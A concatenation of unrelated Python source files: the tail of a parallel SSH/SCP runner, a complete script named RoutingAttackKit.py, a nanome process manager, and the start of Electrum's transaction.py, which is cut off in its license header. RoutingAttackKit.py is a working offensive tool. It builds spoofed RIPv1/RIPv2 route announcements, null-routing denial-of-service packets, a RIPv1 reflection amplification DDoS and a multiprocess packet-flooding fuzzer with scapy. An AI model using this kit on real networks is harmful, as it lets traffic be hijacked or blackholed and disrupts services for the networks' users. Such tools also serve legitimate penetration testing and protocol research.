num = res[1].split(':')
n1 = int(num[0])
n2 = int(num[1]) + 1
for srv_num in range(n1, n2):
servers_lists[group].add(res[0] + str(srv_num))
continue
elif all(sl):
res = sl[0].split('[') + [sl[1]]
num = res[1].split(':')
n1 = int(num[0])
n2 = int(num[1]) + 1
for srv_num in range(n1, n2):
servers_lists[group].add(res[0] + str(srv_num) + res[2])
continue
if self.debug:
print('hosts', self.servers_lists)
def _determine_mode(self):
'''Determin ssh or scp mode. Make resulting servers list for current mode'''
ssh_pat = re.compile(r'^((?P<user>[a-zA-Z0-9\_\-]+)@)?(?P<servers>[a-zA-Z0-9\_\,\.\[\]\*\+\(\)\{\}\?\^\$\|\-]+)')
scp_pat = re.compile(r'^((?P<user>[a-zA-Z0-9\_\-]+)@)?(?P<servers>[a-zA-Z0-9\_\,\.\[\]\*\+\(\)\{\}\?\^\$\-]+):(?P<path>[a-zA-Z0-9_\.\/\-]+)$')
self.mode = self.args.get('mode', 'ssh')
if self.mode == 'ssh':
result = ssh_pat.match(self.args.get('arg1', '')).groupdict()
self.user = result['user']
if not self.user:
self.user = self.args.get('user', 'root')
self.command = self.args.get('arg2', 'uname')
tmp_servers = result['servers'].split(',')
if self.debug:
print('mode', self.mode)
print('tmp_servers', tmp_servers)
self._match_servers(tmp_servers)
elif self.mode == 'scp':
if self.args['arg1'].find(':') != -1:
self.direction = 'from'
result = scp_pat.match(self.args.get('arg1', '')).groupdict()
self.src = result['path']
if not self.src:
self.src = './tst'
self.dst = self.args.get('arg2', './')
elif self.args['arg2'].find(':') != -1:
self.direction = 'to'
result = scp_pat.match(self.args.get('arg2', '')).groupdict()
self.dst = result['path']
if not self.dst:
self.dst = './tst'
self.src = self.args.get('arg1', './')
self.user = result['user']
if not self.user:
self.user = self.args.get('user', 'root')
tmp_servers = result['servers'].split(',')
if self.debug:
print('mode', self.mode)
print('tmp_servers', tmp_servers)
self._match_servers(tmp_servers)
def _match_servers(self, tmp_servers):
'''Make final servers list regarding to host,group,regex from inventory + hosts from cmd which not in inventory'''
self.servers = set()
re_tmp_servers = set()
re_chars = '^${}[]*+|()?'
if not tmp_servers:
tmp_servers = self.args.get('servers', 'localhost').split(',')
for server in tmp_servers:
# check if server name contains regex
for c in re_chars:
if server.find(c) != -1:
regex = 1
re_tmp_servers.add(server)
break
else:
regex = 0
if regex:
regex = 0
continue
# select all servers if server name = all
if server == 'all':
for group in self.servers_lists:
self.servers = self.servers.union(self.servers_lists[group])
continue
# if server name match group - add hosts in group
if server in self.servers_lists:
self.servers = self.servers.union(self.servers_lists[server])
# if host not in config - add as is
else:
self.servers.add(server)
# if any server in list have regex - then only matching servers from non regex servers in list will be in result list
regex_servers = set()
if self.debug:
print('re_tmp_servers', re_tmp_servers)
if re_tmp_servers:
for server in re_tmp_servers:
srv_pat = re.compile(r'%s' % (server))
for srv in self.servers:
if srv_pat.search(srv):
regex_servers.add(srv)
self.servers = regex_servers
if self.debug:
print('regex_servers', regex_servers)
print('servers', self.servers)
def _pepare_threading(self):
'''Prepare storage and options for threading'''
self.async = int(self.args.get('async', 0))
self.threads = range(1, int(self.args.get('threads', 100)) + 1)
self.ssh_out = { 'stdout': {}, 'stderr': {} }
self.ssh_out_tmp = dict()
self.queue = Queue.Queue()
def _ssh_make_cmd(self, server):
'''Assemble final ssh command for Popen'''
if self.mode == 'ssh':
command = ['ssh', self.user + '@' + server, self.command]
elif self.mode == 'scp':
if self.direction == 'to':
command = ['scp', self.src, self.user + '@' + server + ':' + self.dst]
elif self.direction == 'from':
command = ['scp', self.user + '@' + server + ':' + self.src, self.dst + '_' + server]
ssh_options = self.args.get('ssh_options', 'ConnectTimeout=10').split()
for opt in ssh_options:
command.insert(1, '-o')
command.insert(2, opt)
prefix = self.args.get('ssh_prefix', '')
if prefix:
command.insert(0, prefix)
return command
def ssh(self, num):
'''Run ssh or scp to server from list by threads'''
try:
queue = self.queue
while True:
server = queue.get()
command = self._ssh_make_cmd(server)
if num == 1 and self.debug:
print 'command:', command
proc0 = Popen(command, stdout=PIPE, stderr=PIPE)
proc = proc0.communicate()
if proc[0]:
proc_stdout = proc[0].split('\n')[:-1]
self.ssh_out_tmp[num]['stdout'][server] = proc_stdout
if self.async:
for line in proc_stdout:
print server + ' ' + line
if proc[1]:
proc_stderr = proc[1].split('\n')[:-1]
self.ssh_out_tmp[num]['stderr'][server] = proc_stderr
if self.async:
for line in proc_stderr:
print server + ' ' + line
if not any([proc[0], proc[1]]):
ret_code = [str(proc0.returncode)]
self.ssh_out_tmp[num]['stderr'][server] = ret_code
if self.async:
for line in ret_code:
print server + ' ' + line
queue.task_done()
except:
self.ssh_out_tmp[num]['stderr'][server] = ['exception: ' + str(sys.exc_info()) + 'command: ' + str(command)]
queue.task_done()
return
def stats(self):
'''Print resulting output'''
log_file_name = self.args.get('log_file', os.environ['HOME'] + '/ssh.py_out')
if not self.args.get('no_logs', ''):
log_file = open(log_file_name, 'aw')
stdout_sorted = self.ssh_out['stdout'].keys()
stdout_sorted.sort()
stderr_sorted = self.ssh_out['stderr'].keys()
stderr_sorted.sort()
if not self.args.get('no_logs', ''):
log_file.write(str(datetime.datetime.now()) + ' =====ssh_py=====\n')
for server in stdout_sorted:
for line in self.ssh_out['stdout'][server]:
out = server + ' ' + line
if not self.async:
print out
if not self.args.get('no_logs', ''):
log_file.write(out + '\n')
for server in stderr_sorted:
for line in self.ssh_out['stderr'][server]:
out = server + ' ' + line
if not self.async:
print out
if not self.args.get('no_logs', ''):
log_file.write(out + '\n')
if not self.args.get('no_logs', ''):
log_file.close()
# Main loop
if __name__ == '__main__':
C = Ssh()
# threading shit
target0 = C.ssh
queue = C.queue
for num in C.threads:
C.ssh_out_tmp[num] = { 'stdout': {}, 'stderr': {} }
thread = threading.Thread(target=target0, args=(num,))
thread.daemon = True
thread.start()
for server in C.servers:
queue.put(server)
queue.join()
for num in C.threads:
C.ssh_out['stdout'].update(C.ssh_out_tmp[num]['stdout'])
C.ssh_out['stderr'].update(C.ssh_out_tmp[num]['stderr'])
C.stats()
|
RoutingAttackKit.py
|
#!/usr/bin/python
#
# Currently implemented attacks:
# - sniffer - (NOT YET IMPLEMENTED) Sniffer hunting for authentication strings
# - ripv1-route - Spoofed RIPv1 Route Announcements
# - ripv1-dos - RIPv1 Denial of Service via Null-Routing
# - ripv1-ampl - RIPv1 Reflection Amplification DDoS
# - ripv2-route - Spoofed RIPv2 Route Announcements
# - ripv2-dos - RIPv2 Denial of Service via Null-Routing
# - rip-fuzzer - RIPv1/RIPv2 protocol fuzzer, covering RIPAuth and RIPEntry structures fuzzing
#
# Python requirements:
# - scapy
#
# Mariusz Banach / mgeeky, '19, <[email protected]>
#
import sys
import socket
import fcntl
import struct
import string
import random
import commands
import argparse
import multiprocessing
try:
from scapy.all import *
except ImportError:
print('[!] Scapy required: pip install scapy')
sys.exit(1)
VERSION = '0.1'
config = {
'verbose' : False,
'debug' : False,
'delay' : 1.0,
'interface': None,
'processors' : 8,
'network': '',
'spoof': '',
'nexthop': '',
'netmask': '',
'metric': 0,
'auth-type': '',
'auth-data': '',
}
attacks = {}
stopThreads = False
#
# ===============================================
#
def flooder(num, packets):
Logger.dbg('Starting task: {}, packets num: {}'.format(num, len(packets)))
for p in packets:
if stopThreads: break
try:
if stopThreads:
raise KeyboardInterrupt
sendp(p, verbose = False)
if len(p) < 1500:
Logger.dbg("Sent: \n" + str(p))
except KeyboardInterrupt:
break
except Exception as e:
pass
Logger.dbg('Stopping task: {}'.format(num))
class Logger:
@staticmethod
def _out(x):
if config['verbose'] or config['debug']:
sys.stdout.write(x + '\n')
@staticmethod
def out(x):
Logger._out('[.] ' + x)
@staticmethod
def info(x):
Logger._out('[.] ' + x)
@staticmethod
def dbg(x):
if config['debug']:
Logger._out('[dbg] ' + x)
@staticmethod
def err(x):
sys.stdout.write('[!] ' + x + '\n')
@staticmethod
def fail(x):
Logger._out('[-] ' + x)
@staticmethod
def ok(x):
Logger._out('[+] ' + x)
# Well, not very fuzzy that fuzzer I know.
class Fuzzer:
@staticmethod
def get8bitFuzzes():
out = set()
for i in range(9):
out.add(2 ** i - 1)
out.add(2 ** i - 2)
out.add(2 ** i)
out.add(2 ** i + 1)
#out.add(2 ** i + 2)
return [k for k in out if abs(k) < 2**8]
@staticmethod
def get16bitFuzzes():
out = set()
for i in range(17):
out.add(2 ** i - 1)
out.add(2 ** i - 2)
out.add(2 ** i)
out.add(2 ** i + 1)
#out.add(2 ** i + 2)
return [k for k in out if abs(k) < 2**16]
@staticmethod
def get32bitFuzzes():
out = set()
for i in range(33):
out.add(2 ** i - 1)
out.add(2 ** i - 2)
out.add(2 ** i)
out.add(2 ** i + 1)
#out.add(2 ** i + 2)
return [k for k in out if abs(k) < 2**32]
@staticmethod
def deBrujinPattern(length):
if length == 0: return ''
if length >= 20280:
out = ''
out += Fuzzer.deBrujinPattern(20280 - 1)
out += "A" * (length - 20280 - 1)
return out
pattern = ''
for upper in string.ascii_uppercase:
for lower in string.ascii_lowercase:
for digit in string.digits:
if len(pattern) < length:
pattern += upper + lower + digit
else:
out = pattern[:length]
return out
return pattern
@staticmethod
def getFuzzyStrings(maxLen = -1, allOfThem = True):
out = set()
for b in Fuzzer.get16bitFuzzes():
out.add(Fuzzer.deBrujinPattern(b))
if allOfThem:
for b in range(0, 65400, 256):
if maxLen != -1 and b > maxLen: break
out.add(Fuzzer.deBrujinPattern(b))
if maxLen != -1:
return set([x for x in out if len(x) <= maxLen])
return out
@staticmethod
def get32bitProblematicPowersOf2():
return Fuzzer.get32bitFuzzes()
class RoutingAttack:
def __init__(self):
pass
def injectOptions(self, params, config):
pass
def launch(self):
pass
class Sniffer(RoutingAttack):
def __init__(self):
pass
def injectOptions(self, params, config):
self.config = config
self.config.update(params)
def processPacket(pkt):
# TODO
raise Exception('Not yet implemented.')
def launch(self):
# TODO
raise Exception('Not yet implemented.')
def packetCallback(d):
self.processPacket(d)
try:
pkts = sniff(
count = 1000,
filter = 'udp port 520',
timeout = 10.0,
prn = packetCallback,
iface = self.config['interface']
)
except Exception as e:
if 'Network is down' in str(e):
pass
else:
Logger.err('Exception occured during sniffing: {}'.format(str(e)))
except KeyboardInterrupt:
pass
class RIPv1v2Attacks(RoutingAttack):
ripAuthTypes = {
'simple' : 2, 'md5' : 3, 'md5authdata': 1
}
def __init__(self):
self.config = {
'interface' : '',
'delay': 1,
'network' : '',
'metric' : 10,
'netmask' : '255.255.255.0',
'nexthop' : '0.0.0.0',
'spoof' : '',
'version' : 0,
}
@staticmethod
def getRipAuth(config):
ripauth = RIPAuth()
ripauth.authtype = RIPv1v2Attacks.ripAuthTypes[config['auth-type']]
if ripauth.authtype == 2:
ripauth.password = config['auth-data']
elif ripauth.authtype == 1:
ripauth.authdata = config['auth-data']
elif ripauth.authtype == 3:
ripauth.digestoffset = 0
ripauth.keyid = 0
ripauth.authdatalen = len(config['auth-data'])
ripauth.seqnum = 0
return ripauth
def injectOptions(self, params, config):
self.config = config
self.config.update(params)
Logger.info("Fake Route Announcement to be injected:")
Logger.info("\tNetwork: {}".format(config['network']))
Logger.info("\tNetmask: {}".format(config['netmask']))
Logger.info("\tNexthop: {}".format(config['nexthop']))
Logger.info("\tMetric: {}".format(config['metric']))
if not config['network'] or not config['netmask'] \
or not config['nexthop'] or not config['metric']:
Logger.err("Module needs following options to operate: network, netmask, nexthop, metric")
return False
if params['version'] != 1 and params['version'] != 2:
Logger.err("RIP protocol version must be either 1 or 2 as passed in attacks params!")
return False
return True
def launch(self):
packet = self.getPacket()
Logger.info("Sending RIPv{} Spoofed Route Announcements...".format(self.config['version']))
sendp(packet, loop = 1, inter = self.config['delay'], iface = config['interface'])
def getPacket(self):
networkToAnnounce = self.config['network']
metricToAnnounce = self.config['metric']
netmaskToAnnounce = self.config['netmask']
nexthopToAnnounce = self.config['nexthop']
spoofedIp = self.config['spoof']
etherframe = Ether() # Start definition of Ethernet Frame
ip = IP() # IPv4 packet
udp = UDP()
udp.sport = 520 # According to RFC1058, 520/UDP port must be used for solicited communication
udp.dport = 520
rip = RIP()
ripentry = RIPEntry() # Announced route
ripentry.AF = "IP" # Address Family: IP
if 'AF' in self.config.keys():
ripentry.AF = self.config['AF']
ripentry.addr = networkToAnnounce # Spoof route for this network...
ripentry.metric = metricToAnnounce
if self.config['version'] == 1:
ip.dst = '255.255.255.255' # RIPv1 broadcast destination
etherframe.dst = 'ff:ff:ff:ff:ff:ff'
rip.version = 1 # RIPv1
rip.cmd = 2 # Command: Response
elif self.config['version'] == 2:
ip.dst = '224.0.0.9' # RIPv2 multicast destination
rip.version = 2 # RIPv2
rip.cmd = 2 # Command: Response
ripentry.RouteTag = 0
ripentry.mask = netmaskToAnnounce
ripentry.nextHop = nexthopToAnnounce # ... to be going through this next hop device.
if 'rip_cmd' in self.config.keys():
rip.cmd = self.config['rip_cmd']
if not self.config['auth-type']:
rip_packet = etherframe / ip / udp / rip / ripentry
else:
ripauth = RIPv1v2Attacks.getRipAuth(self.config)
Logger.info('Using RIPv2 authentication: type={}, pass="{}"'.format(
self.config['auth-type'], self.config['auth-data']
))
rip_packet = etherframe / ip / udp / rip / ripauth / ripentry
rip_packet[IP].src = spoofedIp
return rip_packet
class RIPFuzzer(RoutingAttack):
ripCommands = (
1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11
)
def __init__(self):
self.config = {
'interface' : '',
'network' : '192.168.1.0',
'metric' : 10,
'netmask' : '255.255.255.0',
'nexthop' : '0.0.0.0',
'spoof' : '',
}
def injectOptions(self, params, config):
self.config = config
self.params = params
return True
def launch(self):
packets = set()
Logger.info("Generating fuzzed packets for RIPv1...")
packets.update(self.generateRipv1Packets())
Logger.info("Generating fuzzed packets for RIPv2...")
packets.update(self.generateRipv2Packets())
Logger.info("Collected in total {} packets to send. Sending them out...".format(len(packets)))
packetsLists = [[] for x in range(self.config['processors'])]
packetsList = list(packets)
for i in range(len(packetsList)):
packetsLists[i % config['processors']].append(packetsList[i])
jobs = []
for i in range(config['processors']):
task = multiprocessing.Process(target = flooder, args = (i, packetsLists[i]))
jobs.append(task)
task.daemon = True
task.start()
print('[+] Started flooding. Press CTRL-C to stop that.')
try:
while jobs:
jobs = [job for job in jobs if job.is_alive()]
except KeyboardInterrupt:
stopThreads = True
print('\n[>] Stopping...')
stopThreads = True
time.sleep(3)
Logger.ok("Fuzzing finished. Sent around {} packets.".format(len(packets)))
def generateRipv1Packets(self):
packets = set()
base = Ether(dst = 'ff:ff:ff:ff:ff:ff') / IP(dst = '255.255.255.255') / UDP(sport = 520, dport = 520)
# Step 1: Fuzz on Command values.
for val in set(RIPFuzzer.ripCommands + tuple(Fuzzer.get8bitFuzzes())):
rip = RIP(version = 1, cmd = val)
packets.add(base / rip)
packets.add(base / rip / RIPEntry() )
# Step 1b: Fuzz on Command values with packet filled up with data
for val in set(RIPFuzzer.ripCommands + tuple(Fuzzer.get8bitFuzzes())):
rip = RIP(version = 1, cmd = val)
for data in Fuzzer.getFuzzyStrings():
if not data: data = ''
packets.add(base / rip / data)
packets.add(base / rip / RIPEntry() / data)
# Step 2: Fuzz on Response RIPEntry AF values.
for val in set(Fuzzer.get8bitFuzzes()):
rip = RIP(version = 1, cmd = 2)
packets.add(base / rip / RIPEntry(AF = val) )
# Step 3: Fuzz on Response RIPEntry RouteTag values.
for val in set(Fuzzer.get8bitFuzzes()):
rip = RIP(version = 1, cmd = 2)
packets.add(base / rip / RIPEntry(RouteTag = val) )
# Step 4: Fuzz on Response RIPEntry metric values.
for val in set(Fuzzer.get8bitFuzzes()):
rip = RIP(version = 1, cmd = 2)
packets.add(base / rip / RIPEntry(metric = val) )
# Step 5: Add multiple RIPEntry structures
for num in Fuzzer.get32bitProblematicPowersOf2():
rip = RIP(version = 1, cmd = 2)
entries = []
try:
ipv4 = socket.inet_ntoa(struct.pack('!L', num))
except:
ipv4 = '127.0.0.2'
if (num * 20) > 2 ** 16:
break
for i in range(num):
entries.append(RIPEntry(addr = ipv4))
packets.add(base / rip / ''.join([str(x) for x in entries]))
return packets
def generateRipv2Packets(self):
packets = set()
base = Ether() / IP(src = self.config['spoof'], dst = '224.0.0.9') / UDP(sport = 520, dport = 520)
# Step 1: Fuzz on Command values.
for val in set(RIPFuzzer.ripCommands + tuple(Fuzzer.get8bitFuzzes())):
rip = RIP(version = 2, cmd = val)
packets.add(base / rip)
packets.add(base / rip / RIPEntry() )
# Step 1b: Fuzz on Command values with packet filled up with data
for val in set(RIPFuzzer.ripCommands + tuple(Fuzzer.get8bitFuzzes())):
rip = RIP(version = 2, cmd = val)
for data in Fuzzer.getFuzzyStrings():
if not data: data = ''
packets.add(base / rip / data)
packets.add(base / rip / RIPEntry() / data)
# Step 2: Fuzz on Version values.
for val in set(Fuzzer.get8bitFuzzes()):
rip = RIP(version = val, cmd = 1)
packets.add(base / rip)
packets.add(base / rip / RIPEntry() )
# Step 3: Fuzz on Authentication data values.
for val in set(Fuzzer.get8bitFuzzes()):
rip = RIP(version = val, cmd = 1)
for auth in RIPFuzzer.fuzzRipv2Auth():
packets.add(base / rip / auth )
packets.add(base / rip / auth / RIPEntry() )
# Step 4: Fuzz on Response RIPEntry AF values.
for val in set(Fuzzer.get8bitFuzzes()):
rip = RIP(version = 2, cmd = 2)
packets.add(base / rip / RIPEntry(AF = val) )
# Step 5: Fuzz on Response RIPEntry RouteTag values.
for val in set(Fuzzer.get8bitFuzzes()):
rip = RIP(version = 2, cmd = 2)
packets.add(base / rip / RIPEntry(RouteTag = val) )
# Step 6: Fuzz on Response RIPEntry metric values.
for val in set(Fuzzer.get8bitFuzzes()):
rip = RIP(version = 2, cmd = 2)
packets.add(base / rip / RIPEntry(metric = val) )
# Step 7: Add multiple RIPEntry structures
for num in Fuzzer.get32bitProblematicPowersOf2():
rip = RIP(version = 2, cmd = 2)
entries = []
try:
ipv4 = socket.inet_ntoa(struct.pack('!L', num))
except:
ipv4 = '127.0.0.2'
if (num * 20) > 2 ** 16:
break
for i in range(num):
entries.append(RIPEntry(addr = ipv4))
packets.add(base / rip / ''.join([str(x) for x in entries]))
return packets
@staticmethod
def fuzzRipv2Auth():
auths = set()
# Step 1: Fuzz on RIPAuth authtype.
for val in set(Fuzzer.get8bitFuzzes()):
ripauth = RIPAuth()
ripauth.authtype = val
ripauth.password = '0123456789abcdef'
auths.add(ripauth)
# Step 2: Fuzz on RIPAuth md5authdata structure's digestoffset.
for val in set(Fuzzer.get16bitFuzzes()):
ripauth = RIPAuth()
ripauth.authtype = 1
ripauth.digestoffset = val
ripauth.keyid = 0
ripauth.authdatalen = '\x01\x02\x03\x04\x05\x06\x07\x08'
ripauth.seqnum = 0
auths.add(ripauth)
# Step 3: Fuzz on RIPAuth md5authdata structure's keyid.
for val in set(Fuzzer.get8bitFuzzes()):
ripauth = RIPAuth()
ripauth.authtype = 1
ripauth.digestoffset = 0
ripauth.keyid = val
ripauth.authdatalen = '\x01\x02\x03\x04\x05\x06\x07\x08'
ripauth.seqnum = 0
auths.add(ripauth)
# Step 4: Fuzz on RIPAuth md5authdata structure's seqnum.
for val in set(Fuzzer.get8bitFuzzes()):
ripauth = RIPAuth()
ripauth.authtype = 1
ripauth.digestoffset = 0
ripauth.keyid = 0
ripauth.authdatalen = '\x01\x02\x03\x04\x05\x06\x07\x08'
ripauth.seqnum = val
auths.add(ripauth)
# Step 5: Fuzz on RIPAuth md5authdata structure's authdatalen.
for val in set(Fuzzer.getFuzzyStrings(maxLen = 16, allOfThem = False)):
ripauth = RIPAuth()
ripauth.authtype = 1
ripauth.digestoffset = 0
ripauth.keyid = 0
ripauth.authdatalen = val
ripauth.seqnum = 0
auths.add(ripauth)
return auths
def getHwAddr(ifname):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', ifname[:15]))
return ':'.join(['%02x' % ord(char) for char in info[18:24]])
def getIfaceIP(iface):
out = shell("ip addr show " + iface + " | grep 'inet ' | awk '{print $2}' | head -1 | cut -d/ -f1")
Logger.dbg('Interface: {} has IP: {}'.format(iface, out))
return out
def shell(cmd):
out = commands.getstatusoutput(cmd)[1]
Logger.dbg('shell("{}") returned:\n"{}"'.format(cmd, out))
return out
def selectDefaultInterface():
global config
commands = {
'ip' : "ip route show | grep default | awk '{print $5}' | head -1",
'ifconfig': "route -n | grep 0.0.0.0 | grep 'UG' | awk '{print $8}' | head -1",
}
for k, v in commands.items():
out = shell(v)
if len(out) > 0:
Logger.dbg('Default interface lookup command returned:\n{}'.format(out))
config['interface'] = out
return out
return ''
def parseOptions(argv):
global config
print('''
:: Routing Protocols Exploitation toolkit
Sends out various routing protocols management frames
Mariusz Banach / mgeeky '19, <[email protected]>
v{}
'''.format(VERSION))
parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options]')
parser.add_argument('-v', '--verbose', action='store_true', help='Display verbose output.')
parser.add_argument('-D', '--debug', action='store_true', help='Display debug output.')
parser.add_argument('-d', '--delay', type=float, default=1.0, help='Delay in seconds (float) between sending consecutive packets. Default: 1 second. Not applies to fuzzers.')
parser.add_argument('-t', '--attack', metavar='ATTACK', default='', help='Select attack to launch. One can use: "-t list" to list available attacks.')
parser.add_argument('-i', '--interface', metavar='DEV', default='', help='Select interface on which to operate.')
parser.add_argument('-s', '--spoof', help = 'IP address to be used as a spoofed/fake gateway, e.g. Attacker machine address. By default will try to figure out that address automatically.', default='')
auth = parser.add_argument_group('Routing Protocol Authentication', 'Specifies authentication data for Routing protocol to use')
auth.add_argument('--auth-type', help = 'Authentication type. Can be one of following: "simple", "md5authdata", "md5". Applies only to authentication-capable protocols, like RIPv2', default='')
auth.add_argument('--auth-data', help = 'Password / authentication data to pass in every packet. This field depends on the "--auth-type" used.', default='')
route = parser.add_argument_group('Spoofed Route injection', 'Specifies fake route details to inject')
route.add_argument('-a', '--network', help = 'IP address of network to announce, can be paired with netmask in CIDR notation. One can use "default" for 0.0.0.0')
route.add_argument('-b', '--netmask', help = 'Netmask to use (can be inferred from "--network". Default: /24', default='255.255.255.0')
route.add_argument('-c', '--nexthop', help = 'Spoofed next hop address. Default: 0.0.0.0.', default = '0.0.0.0')
route.add_argument('-m', '--metric', help = 'Metric to be used. The lower the greater priority it gets. Default: 10', type=int, default='10')
args = parser.parse_args()
if not 'attack' in args:
Logger.err('You must specify an attack to launch!')
return False
if args.attack == 'list':
print("Available attacks:")
for a in attacks:
print("\t{}. '{}' - {}".format(a['num'], a['name'], a['desc']))
sys.exit(0)
else:
att = args.attack
try:
att = int(att)
except: pass
for a in attacks:
if att == a['num'] or att == a['name']:
config['attack'] = a
break
if 'attack' not in config or not config['attack']:
Logger.err("Selected attack is not implemented or wrongly stated.")
parser.print_help()
return False
config['verbose'] = args.verbose
config['debug'] = args.debug
config['delay'] = args.delay
if args.interface != '': config['interface'] = args.interface
else: config['interface'] = selectDefaultInterface()
if args.network != '': config['network'] = args.network
if args.spoof != '': config['spoof'] = args.spoof
else: config['spoof'] = getIfaceIP(config['interface'])
Logger.info("Using {} as local/spoof IP address".format(config['spoof']))
if args.netmask != '': config['netmask'] = args.netmask
if args.nexthop != '': config['nexthop'] = args.nexthop
if args.metric != '': config['metric'] = args.metric
if args.auth_type != '': config['auth-type'] = args.auth_type
if args.auth_data != '': config['auth-data'] = args.auth_data
if config['auth-type'] != '':
if config['auth-data'] == '':
Logger.err("You must specify authentication data along with the --auth-type.")
return False
config['auth-type'] = args.auth_type
config['auth-data'] = args.auth_data
return args
def main(argv):
global attacks
attacks = (
{
'num': 0,
'name': 'sniffer',
'desc': '(NOT YET IMPLEMENTED) Sniffer hunting for authentication strings.',
'object': Sniffer,
'params': {
}
},
{
'num': 1,
'name': 'ripv1-route',
'desc': 'RIP Spoofed Route announcement',
'object': RIPv1v2Attacks,
'params': {
'version' : 1,
}
},
{
'num': 2,
'name': 'ripv1-dos',
'desc': 'RIPv1 Denial of Service by Null-routing',
'object': RIPv1v2Attacks,
'params': {
'version' : 1,
'delay' : 1,
'network': '0.0.0.0',
'metric': 1
}
},
{
'num': 3,
'name': 'ripv1-ampl',
'desc': 'RIPv1 Reflection Amplification DDoS',
'object': RIPv1v2Attacks,
'params': {
'version' : 1,
'delay' : 0.5,
'network': '0.0.0.0',
'netmask': '0.0.0.0',
'nexthop': '0.0.0.1',
'metric': 1,
'AF': 0, # Unspecified
'rip_cmd': 1, # Request
}
},
{
'num': 4,
'name': 'ripv2-route',
'desc': 'RIPv2 Spoofed Route announcement',
'object': RIPv1v2Attacks,
'params': {
'version' : 2,
}
},
{
'num': 5,
'name': 'ripv2-dos',
'desc': 'RIPv2 Denial of Service by Null-routing',
'object': RIPv1v2Attacks,
'params': {
'version' : 2,
'delay' : 1,
'network': '0.0.0.0',
'netmask': '0.0.0.0',
'nexthop': '0.0.0.1',
'metric': 1
}
},
{
'num': 6,
'name': 'rip-fuzzer',
'desc': 'RIP/RIPv2 packets fuzzer',
'object': RIPFuzzer,
'params': {
}
},
)
opts = parseOptions(argv)
if not opts:
Logger.err('Options parsing failed.')
return False
if os.getuid() != 0:
Logger.err('This program must be run as root.')
return False
load_contrib('ospf')
load_contrib('eigrp')
load_contrib('bgp')
attack = config['attack']['object']()
print("[+] Launching attack: {}".format(config['attack']['desc']))
if attack.injectOptions(config['attack']['params'], config):
attack.launch()
else:
Logger.err("Module prerequisite options were not passed correctly.")
if __name__ == '__main__':
main(sys.argv)
|
_process_manager.py
|
from collections import deque
import subprocess
import traceback
import sys
from threading import Thread
try:
from queue import Queue, Empty
except ImportError:
from Queue import Queue, Empty # python 2.x
from nanome._internal._process import _ProcessEntry
from nanome.util import Logs, IntEnum, auto
POSIX = 'posix' in sys.builtin_module_names
class _ProcessManager():
class _DataType(IntEnum):
queued = auto()
position_changed = auto()
starting = auto()
error = auto()
output = auto()
done = auto()
class _CommandType(IntEnum):
start = auto()
stop = auto()
_max_process_count = 10
def __init__(self):
self.__pending = deque()
self.__running = []
def _update(self):
try:
for i in range(len(self.__running) - 1, -1, -1):
proc = self.__running[i]
if self.__update_process(proc) == False:
del self.__running[i]
spawn_count = min(_ProcessManager._max_process_count - len(self.__running), len(self.__pending))
if spawn_count > 0:
while spawn_count > 0:
self.__start_process()
spawn_count -= 1
count_before_exec = 1
for entry in self.__pending:
entry.send(_ProcessManager._DataType.position_changed, [count_before_exec])
count_before_exec += 1
except:
Logs.error("Exception in process manager update:\n", traceback.format_exc())
def __start_process(self):
entry = self.__pending.popleft()
entry.send(_ProcessManager._DataType.starting, [])
request = entry.request
args = [request.executable_path] + request.args
has_text = entry.output_text
def enqueue_output(pipe, queue, text):
if text:
sentinel = ''
else:
sentinel = b''
for line in iter(pipe.readline, sentinel):
queue.put(line)
pipe.close()
try:
entry.process = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE, bufsize=1, cwd=request.cwd_path, universal_newlines=has_text, close_fds=POSIX)
Logs.debug("Process started:", request.executable_path, "for session", entry.session._session_id)
except:
Logs.error("Couldn't execute process", request.executable_path, "Please check if executable is present and has permissions:\n", traceback.format_exc())
entry.send(_ProcessManager._DataType.done, [-1])
return
entry.stdout_queue = Queue()
entry.stderr_queue = Queue()
thread_out = Thread(target=enqueue_output, args=(entry.process.stdout, entry.stdout_queue, has_text), daemon=True)
thread_err = Thread(target=enqueue_output, args=(entry.process.stderr, entry.stderr_queue, has_text), daemon=True)
thread_out.start()
thread_err.start()
self.__running.append(entry)
def __update_process(self, entry):
# Process stdout and stderr
if entry.output_text:
output = ""
error = ""
else:
output = b""
error = b""
try:
while True:
output += entry.stdout_queue.get_nowait()
except Empty:
pass
try:
while True:
error += entry.stderr_queue.get_nowait()
except Empty:
pass
# error = error[entry._processed_error:]
# entry._processed_error += len(error)
if error:
entry.send(_ProcessManager._DataType.error, [error])
# output = output[entry._processed_output:]
# entry._processed_output += len(output)
if output:
entry.send(_ProcessManager._DataType.output, [output])
# Check if process finished
return_value = entry.process.poll()
if return_value is not None:
# Finish process
entry.send(_ProcessManager._DataType.done, [return_value])
return False
return True
def __stop_process(self, id):
for entry in self.__running:
if entry.request.id == id:
entry.process.terminate()
break
def _remove_session_processes(self, session_id):
pending = [e for e in self.__pending if e.session._session_id == session_id]
running = [e for e in self.__running if e.session._session_id == session_id]
for entry in pending:
self.__pending.remove(entry)
for entry in running:
entry.process.kill()
self.__running.remove(entry)
def _received_request(self, data, session):
type = data[0]
if type == _ProcessManager._CommandType.start:
request = data[1]
entry = _ProcessEntry(request, session)
self.__pending.append(entry)
session.send_process_data([_ProcessManager._DataType.queued, request])
elif type == _ProcessManager._CommandType.stop:
self.__stop_process(data[1])
else:
Logs.error("Received unknown process command type")
|
transaction.py
|
#!/usr/bin/env python3
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
